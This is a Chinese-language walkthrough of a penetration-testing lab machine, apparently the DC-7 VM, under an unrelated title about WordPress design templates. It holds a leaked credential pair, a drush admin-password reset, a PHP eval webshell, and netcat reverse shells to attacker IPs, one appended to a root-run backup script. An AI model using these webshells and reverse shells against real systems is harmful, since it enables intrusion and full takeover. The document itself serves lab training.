国外的室内设计网站wordpress 模板 国外

1. 信息查询

1.1. 查看ip

arp-scan  -l

192.168.220.136

1.2. 端口

nmap -T4  -A  -p-  192.168.220.136

访问端口号

2. 渗透阶段

2.1. 通过DCUSER 获取账号密码

然后在当前的页面中可以发现@DCUSER，不知道是什么，扔到谷歌进行查询，发现原来是 github 上的一位博主名字

发现了有源码信息的泄露

dc7user

MdR3xOgB7#dW

2.2. 远程连接获取 backups.sh

远程连接当前用户

ssh  dc7user@192.168.220.136

通过查看 home 目录下的文件，发现了 mbox，查看文件内容以后，发现是一封邮件，在邮件中可以看到如果想要提权可以使用 backups.sh

ls -lcat mbox

查看文件内容

cat  /opt/scripts/backups.shls -l /opt/scripts/backups.sh

2.3. drush 介绍

发现当前想要提权需要为 www-data 用户组才可以，在脚本中发现了 drush，百度查一下发现原来是个大宝贝

Drush 是一个很棒的 shell 界面，用于直接从您的云服务器命令行管理 Drupal。这是一个非常有用的工具，因为它可以帮助您在终端中仅使用一两个命令来执行各种管理任务，而无需在 UI 中进行多次点击和页面刷新。

您是否在您的站点上处理许多用户帐户？ Drush 可以帮助轻松管理它。

您可以使用以下命令创建新用户：

drush user-create username --mail="email@example.com" --password="password"

然后终端将显示有关新创建的用户的一些信息。想删除这个用户？使用以下命令：

drush user-cancel username

就这么简单。想更改密码？或与此相关的任何其他用户密码？运行以下命令：

drush user-password admin --password="new_pass"

那现在我们就可以直接使用这个工具来修改 admin 的密码

drush user-password admin --password="admin"

注意:需要在/var/www/html 目录下进行密码的修改

2.4. 一句话木马

接下来进行登录

编辑页面可以发现当前有一个可输入的富文本框，可以尝试去写入一句话木马，但是又发现当前的富文本不支持 php 环境，此时需要查看平台是否能安装 php 环境

这样php环境就安装好了

在勾选一下选项

Ok了

传入一句话木马

<?php @eval($_POST[123])?>

这里注意要先选择php再编写一句话木马

直接进入首页发现 一句话木马已经执行，接下来就可以使用蚁剑进行连接

2.5. 蚁剑连接反弹shell(进入 www-data 用户)

进入蚁剑的命令行终端

kali中nc -lvvp 4444python -c 'import pty;pty.spawn("/bin/bash")'蚁剑nc -e /bin/bash 192.168.126.138 4444

192.168.220.146

2.6. 反弹 shell 获取 root 权限

因为当前已经是 www-data 的用户了，接下来就可以去执行/opt/scripts/backups.sh 这个脚本，执行这个脚本最终我们想要让他通过反弹提权到 root，所以需要将反弹的代码追加到脚本中

echo  "nc -e /bin/bash 192.168.220.146 7777"  >> /opt/scripts/backups.shcat  /opt/scripts/backups.sh

接下来在 kali 中设置监听

nc  -lvp 7777